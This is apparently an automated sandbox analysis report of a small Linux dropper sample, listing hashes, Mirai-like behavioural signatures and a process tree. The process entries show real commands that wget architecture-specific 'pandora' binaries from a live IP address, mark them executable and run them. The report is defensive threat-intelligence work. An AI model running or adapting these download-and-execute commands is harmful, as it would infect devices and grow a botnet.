Analysis
- max time kernel: 13926s
- max time network: 152s
- platform: linux_mipsel
- resource: debian9-mipsel-en-20211208
- submitted: 18-05-2022 21:23

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
  Resource: ubuntu1804-amd64-en-20211208
- Behavioral task: behavioral2
  Sample: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
  Resource: debian9-armhf-en-20211208
- Behavioral task: behavioral3
  Sample: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
  Resource: debian9-mipsbe-en-20211208
- Behavioral task: behavioral4
  Sample: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
  Resource: debian9-mipsel-en-20211208

General
- Target: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
- Size: 2KB
- MD5: c7866a6bf93fe47bb819d8f5d379e353
- SHA1: 757fb6c3a1aa19e129b3ea3fef1da5bcfe70e55c
- SHA256: e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
- SHA512: 370ee08829af83c795191036f041e89949d1b03eb3b35452c17dc08555ca5633a1c0262ff2f4aaa730036973c510642dd3d0476b7bdad0d8839cd05087a10733
Malware Config

Signatures
- Contacts a large (136179) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Modifies the Watchdog daemon (1 TTP)
  Malware like Mirai modifies the Watchdog to prevent it from restarting an infected system.
- Writes file to system bin folder (1 TTP, 1 IoC)
- Enumerates active TCP sockets (1 TTP, 1 IoC)
  Gets active TCP sockets from the /proc virtual filesystem.
- Writes file to user bin folder (1 TTP, 1 IoC)
- Reads system network configuration (1 TTP, 1 IoC)
  Uses contents of the /proc filesystem to enumerate network settings.
- Reads runtime system information (64 IoCs)
  Reads data from the /proc virtual filesystem.
Processes
Each entry lists the process image (PID, process-tree level) followed by its command line.
- ./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f (PID 322, level 1): ./e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f
- /usr/bin/wget (PID 324, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.x86
- /bin/cat (PID 329, level 2): cat pandora.x86
- /bin/chmod (PID 330, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 331, level 2): ./awoo
- /usr/bin/wget (PID 333, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.mips
- /bin/cat (PID 335, level 2): cat pandora.mips
- /bin/chmod (PID 336, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 337, level 2): ./awoo
- /usr/bin/wget (PID 339, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.mpsl
- /bin/cat (PID 341, level 2): cat pandora.mpsl
- /bin/chmod (PID 342, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 343, level 2): ./awoo
- /usr/bin/wget (PID 350, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.arm4
- /bin/chmod (PID 355, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 356, level 2): ./awoo
- /usr/bin/wget (PID 363, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.arm5
- /bin/chmod (PID 369, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 370, level 2): ./awoo
- /usr/bin/wget (PID 374, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.arm6
- /bin/chmod (PID 380, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 381, level 2): ./awoo
- /usr/bin/wget (PID 388, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.arm7
- /bin/chmod (PID 391, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 392, level 2): ./awoo
- /usr/bin/wget (PID 397, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.ppc
- /bin/chmod (PID 402, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 403, level 2): ./awoo
- /usr/bin/wget (PID 407, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.m68k
- /bin/chmod (PID 413, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 414, level 2): ./awoo
- /usr/bin/wget (PID 418, level 2): wget http://107.174.176.165/Pandoras_Box/pandora.sh4
- /bin/chmod (PID 424, level 2): chmod +x awoo e8527836291246c811470f46bcb9e3785b01d89f842e64d67f778b194a049c1f pandora.arm5 pandora.arm6 pandora.arm7 pandora.m68k pandora.mips pandora.mpsl pandora.ppc pandora.sh4 pandora.x86 systemd-private-0d3573f58ef74f22a1fe929693d129ab-systemd-timesyncd.service-8gSy6k
- ./awoo (PID 425, level 2): ./awoo